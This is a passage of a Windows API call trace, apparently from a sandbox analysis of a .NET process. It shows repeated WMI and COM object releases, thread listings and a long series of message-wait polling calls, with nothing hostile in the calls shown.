CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.790] WbemDefPath:IUnknown:Release (This=0x5718f38) returned 0x1 [0283.790] WbemDefPath:IUnknown:Release (This=0x5718f38) returned 0x0 [0283.790] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.790] WbemDefPath:IUnknown:Release (This=0x5719018) returned 0x1 [0283.790] WbemDefPath:IUnknown:Release (This=0x5719018) returned 0x0 [0283.790] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.790] WbemDefPath:IUnknown:Release (This=0x57190f8) returned 0x1 [0283.790] WbemDefPath:IUnknown:Release (This=0x57190f8) returned 0x0 [0283.790] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.790] WbemDefPath:IUnknown:Release (This=0x57191d8) returned 0x1 [0283.790] WbemDefPath:IUnknown:Release (This=0x57191d8) returned 0x0 [0283.791] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.791] WbemDefPath:IUnknown:Release (This=0x57192b8) returned 0x1 [0283.791] WbemDefPath:IUnknown:Release (This=0x57192b8) returned 0x0 [0283.791] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.791] WbemDefPath:IUnknown:Release (This=0x5719398) returned 0x1 [0283.791] WbemDefPath:IUnknown:Release (This=0x5719398) returned 0x0 [0283.791] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.791] WbemDefPath:IUnknown:Release (This=0x5719478) returned 0x1 [0283.791] WbemDefPath:IUnknown:Release (This=0x5719478) returned 0x0 [0283.791] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.791] WbemDefPath:IUnknown:Release (This=0x5719558) returned 0x1 [0283.791] WbemDefPath:IUnknown:Release (This=0x5719558) returned 0x0 [0283.791] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.791] WbemDefPath:IUnknown:Release (This=0x5719638) returned 0x1 [0283.791] WbemDefPath:IUnknown:Release (This=0x5719638) returned 0x0 [0283.791] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.791] WbemDefPath:IUnknown:Release (This=0x5719718) returned 0x1 [0283.791] WbemDefPath:IUnknown:Release (This=0x5719718) returned 0x0 [0283.791] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.791] WbemDefPath:IUnknown:Release (This=0x57197f8) returned 0x1 [0283.791] WbemDefPath:IUnknown:Release (This=0x57197f8) returned 0x0 [0283.792] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.792] WbemDefPath:IUnknown:Release (This=0x57198d8) returned 0x1 [0283.792] WbemDefPath:IUnknown:Release (This=0x57198d8) returned 0x0 [0283.792] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.792] WbemDefPath:IUnknown:Release (This=0x57199b8) returned 0x1 [0283.792] WbemDefPath:IUnknown:Release (This=0x57199b8) returned 0x0 [0283.792] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.792] WbemDefPath:IUnknown:Release (This=0x5719a98) returned 0x1 [0283.792] WbemDefPath:IUnknown:Release (This=0x5719a98) returned 0x0 [0283.792] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.792] WbemDefPath:IUnknown:Release (This=0x5719b78) returned 0x1 [0283.792] WbemDefPath:IUnknown:Release (This=0x5719b78) returned 0x0 [0283.792] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.792] WbemDefPath:IUnknown:Release (This=0x5719c58) returned 0x1 [0283.792] WbemDefPath:IUnknown:Release (This=0x5719c58) returned 0x0 [0283.792] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.792] WbemDefPath:IUnknown:Release (This=0x5719d38) returned 0x1 [0283.792] WbemDefPath:IUnknown:Release (This=0x5719d38) returned 0x0 [0283.792] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.792] WbemDefPath:IUnknown:Release (This=0x5719e18) returned 0x1 [0283.792] WbemDefPath:IUnknown:Release (This=0x5719e18) returned 0x0 [0283.792] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.793] WbemDefPath:IUnknown:Release (This=0x5728fc8) returned 0x1 [0283.793] WbemDefPath:IUnknown:Release (This=0x5728fc8) returned 0x0 [0283.793] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.793] WbemDefPath:IUnknown:Release (This=0x57290a8) returned 0x1 [0283.793] WbemDefPath:IUnknown:Release (This=0x57290a8) returned 0x0 [0283.793] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.793] WbemDefPath:IUnknown:Release (This=0x5729188) returned 0x1 [0283.793] WbemDefPath:IUnknown:Release (This=0x5729188) returned 0x0 [0283.793] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.793] WbemDefPath:IUnknown:Release (This=0x5729268) returned 0x1 [0283.793] WbemDefPath:IUnknown:Release (This=0x5729268) returned 0x0 [0283.793] CoGetContextToken (in: pToken=0x107f634 | out: pToken=0x107f634) returned 0x0 [0283.793] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.793] WbemLocator:IUnknown:Release (This=0x5ada30) returned 0x1 [0283.793] WbemLocator:IUnknown:Release (This=0x5ada30) returned 0x0 [0283.826] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0283.826] WbemLocator:IUnknown:Release (This=0x5ad7b0) returned 0x1 [0283.826] WbemLocator:IUnknown:Release (This=0x5ad7b0) returned 0x0 [0283.827] IUnknown:Release (This=0x500338) returned 0x0 [0284.155] GdipDisposeImage (image=0x5332230) returned 0x0 Thread: id = 162 os_tid = 0xfdc Thread: id = 163 os_tid = 0xfe0 Thread: id = 164 os_tid = 0xfe4 Thread: id = 165 os_tid = 0xfe8 Thread: id = 166 os_tid = 0xfec [0259.117] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0259.120] ResetEvent (hEvent=0x26c) returned 1 Thread: id = 169 os_tid = 0xff8 [0274.155] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0274.158] CoGetContextToken (in: pToken=0x55ffb44 | out: pToken=0x55ffb44) returned 0x0 [0274.158] CObjectContext::QueryInterface () returned 0x0 [0274.158] CObjectContext::GetCurrentThreadType () returned 0x0 [0274.158] Release () returned 0x0 [0274.158] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0274.159] CoUninitialize () [0274.228] CancelIoEx (hFile=0x344, lpOverlapped=0x0) returned 1 Thread: id = 170 os_tid = 0xffc Thread: id = 171 os_tid = 0x31c Thread: id = 172 os_tid = 0xc50 [0275.994] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0275.996] SetConsoleCtrlHandler (HandlerRoutine=0xbc0b5e, Add=1) returned 1 [0275.997] GetModuleHandleW (lpModuleName=0x0) returned 0x70000 [0275.998] GetModuleHandleW (lpModuleName=0x0) returned 0x70000 [0275.999] GetClassInfoW (in: hInstance=0x70000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.3d893c.0", lpWndClass=0x2703000 | out: lpWndClass=0x2703000) returned 0 [0276.002] CoTaskMemAlloc (cb=0x56) returned 0x560fa8 [0276.002] RegisterClassW (lpWndClass=0x5a6f2e8) returned 0xc1ba [0276.002] CoTaskMemFree (pv=0x560fa8) [0276.004] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.3d893c.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.3d893c.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x70000, lpParam=0x0) returned 0xa00cc [0276.004] NtdllDefWindowProc_W () returned 0x1 [0276.005] NtdllDefWindowProc_W () returned 0x0 [0276.006] NtdllDefWindowProc_W () returned 0x0 [0276.006] NtdllDefWindowProc_W () returned 0x0 [0276.006] NtdllDefWindowProc_W () returned 0x0 [0276.006] SetEvent (hEvent=0x3c4) returned 1 [0276.007] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.241] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.490] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.740] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.943] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.177] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.411] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.689] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.879] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.098] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.362] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.565] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.848] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.096] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.361] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.538] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.717] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.891] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.108] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.265] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.425] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.593] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.865] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.077] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.265] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.545] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.781] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.997] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.153] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.301] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.449] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.723] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.888] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.090] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.309] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.511] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.916] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.240] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.353] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.478] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.634] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.805] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.956] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.117] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.273] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.430] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.596] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.777] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.913] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.078] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.225] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.381] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.537] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.693] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.865] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.036] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.192] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.348] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.516] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.669] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.816] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.150] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.315] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) Thread: id = 173 os_tid = 0xc40 Thread: id = 181 os_tid = 0x39c